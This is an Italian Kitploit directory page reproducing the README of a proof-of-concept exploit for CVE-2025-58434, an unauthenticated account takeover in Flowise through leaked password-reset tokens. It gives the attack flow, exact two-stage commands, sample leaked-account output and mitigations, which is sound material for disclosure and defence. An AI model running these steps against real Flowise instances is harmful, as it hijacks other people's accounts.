Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-58434-poc — Exploit proof-of-concept per CVE-2025-58434, che dimostra l'acquisizione non autenticata di account in Flowise tramite token di reset della password divulgati. Include un attacco in due fasi: fuga del token e reset della password. | Kitploit
Strumenti/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e FormazioneRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Exploit proof-of-concept per CVE-2025-58434, che dimostra l'acquisizione non autenticata di account in Flowise tramite token di reset della password divulgati. Include un attacco in due fasi: fuga del token e reset della password.

Vedi Repository
1385 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-58434 — Acquisizione dell'account Flowise tramite divulgazione del token

CVE CVSS Python License Disclosure

⚠️ Questo repository è destinato esclusivamente a scopi educativi e a ricerche di sicurezza autorizzate.
L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha esplicito permesso di test è illegale.


Indice

  • Panoramica
  • Dettagli della vulnerabilità
  • Flusso dell'attacco
  • Versioni interessate
  • Struttura del repository
  • Requisiti
  • Installazione
  • Utilizzo
  • Esempio di output
  • Mitigazione
  • Cronologia della divulgazione
  • Riferimenti
  • Disclaimer

  • Panoramica

    L'endpoint forgot-password in Flowise (sia nella versione cloud che in quella self-hosted) restituisce un token di reset della password valido (tempToken) direttamente nel corpo della risposta HTTP — senza alcuna verifica email o autenticazione.

    Ciò significa che un attaccante che conosce (o può indovinare) l'indirizzo email di una vittima può:

    1. Chiamare l'endpoint forgot-password → ricevere il tempToken nella risposta JSON
    2. Utilizzare il tempToken per chiamare reset-password → impostare una nuova password arbitraria
    3. Accedere come vittima → compromissione completa dell'account (ATO)

    Non è richiesto alcun accesso preliminare, alcuna interazione dell'utente e alcun accesso alla email.


    Dettagli della vulnerabilità

    CampoValore
    ID CVECVE-2025-58434
    Punteggio CVSS9.8 (Critico)
    Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: Meccanismo debole di recupero password
    TipoBypass dell'autenticazione / Esposizione di oggetto diretto non sicura
    App interessataFlowise (cloud + self-hosted)
    Endpoint 1POST /api/v1/account/forgot-password
    Endpoint 2POST /api/v1/account/reset-password

    Causa principale

    Il gestore di forgot-password restituisce l'intero record dell'utente — incluso il tempToken generato — direttamente nella risposta API invece di inviarlo solo all'indirizzo email registrato dell'utente.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Victim Name",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<LEAKED_TOKEN_HERE>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Flusso dell'attacco

    root@kitploit:~
    Attacker                              Flowise API
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (generates tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (password changed!)          │
       │                                       │
       ✓  Account Takeover Complete
    

    Versioni interessate

    • Flowise Cloud (cloud.flowiseai.com) — confermato vulnerabile
    • Tutte le distribuzioni Flowise self-hosted precedenti alla patch

    Controlla il repository GitHub ufficiale di Flowise per informazioni sulle versioni corrette.


    Struttura del repository

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
    ├── requirements.txt         # Python dependencies
    ├── README.md                # This file
    └── DISCLAIMER.md            # Legal notice (read before use)
    

    Requisiti

    • Python 3.7 o superiore
    • Libreria requests

    Installazione

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # Install dependencies
    pip install -r requirements.txt
    

    Utilizzo

    Schermata di aiuto

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Fase 1 — Ottenere il token (Ricognizione)

    Conferma che l'istanza è vulnerabile e recupera il tempToken senza reimpostare alcuna password.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    Fase 2 — Compromissione completa dell'account

    Utilizza il token divulgato per reimpostare immediatamente la password.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    Ottenere la risposta JSON grezza

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    Tutte le opzioni

    FlagBreveDescrizionePredefinito
    --url URL-uURL di base dell'istanza Flowise(obbligatorio)
    --email EMAIL-eIndirizzo email dell'account target(obbligatorio)
    --reset-rEsegui la Fase 2: reimposta la password con il token divulgatoFalse
    --new-password PASS-pNuova password da impostare (usata con --reset)Changeme@2025!
    --timeout SECONDS-tTimeout della richiesta HTTP10
    --json-output-jStampa la risposta JSON grezza dell'API su stdoutFalse

    Esempio di output

    root@kitploit:~
      [Step 1] Sending forgot-password request …
      [*] HTTP Status : 201
    
      ========================================================================
        LEAKED ACCOUNT DATA
      ========================================================================
        User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Name          : Admin User
        Email         : [email protected]
        Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Status        : active
        tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry   : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!
    

    Mitigazione

    Se sei un operatore di un'istanza Flowise, applica immediatamente le seguenti mitigazioni:

    1. Non restituire mai i token di reset nelle risposte API. Invia il token esclusivamente tramite l'indirizzo email registrato.
    2. Restituisci un messaggio di successo generico da forgot-password indipendentemente dal fatto che l'email esista — questo impedisce anche l'enumerazione degli account.
    3. Applica vincoli al token:
      • Uso singolo (invalida dopo il primo utilizzo)
      • Scadenza breve (es. 15 minuti)
      • Legato all'IP richiedente / User-Agent dove possibile
    4. Applica la correzione a tutti i modelli di distribuzione — cloud e self-hosted.
    5. Aggiungi il rate limiting all'endpoint forgot-password.
    6. Registra e avvisa in caso di attività anomala di reset della password.
    7. Considera l'MFA per gli account amministratore e ad alto privilegio.

    Cronologia della divulgazione

    DataEvento
    2025-08-19Vulnerabilità scoperta e segnalata
    TBDRiconoscimento del fornitore
    TBDPatch rilasciata
    TBDDivulgazione pubblica

    Riferimenti

    • GitHub Advisory GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Flowise GitHub Repository
    • CWE-640: Weak Password Recovery Mechanism

    Disclaimer

    Questo progetto è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.

    • NON eseguire questo strumento contro alcun sistema senza esplicita autorizzazione scritta del proprietario del sistema.
    • Gli autori di questo repository non si assumono alcuna responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante da uso non autorizzato.
    • Consulta DISCLAIMER.md per l'informativa legale completa.
    Scarica lo strumento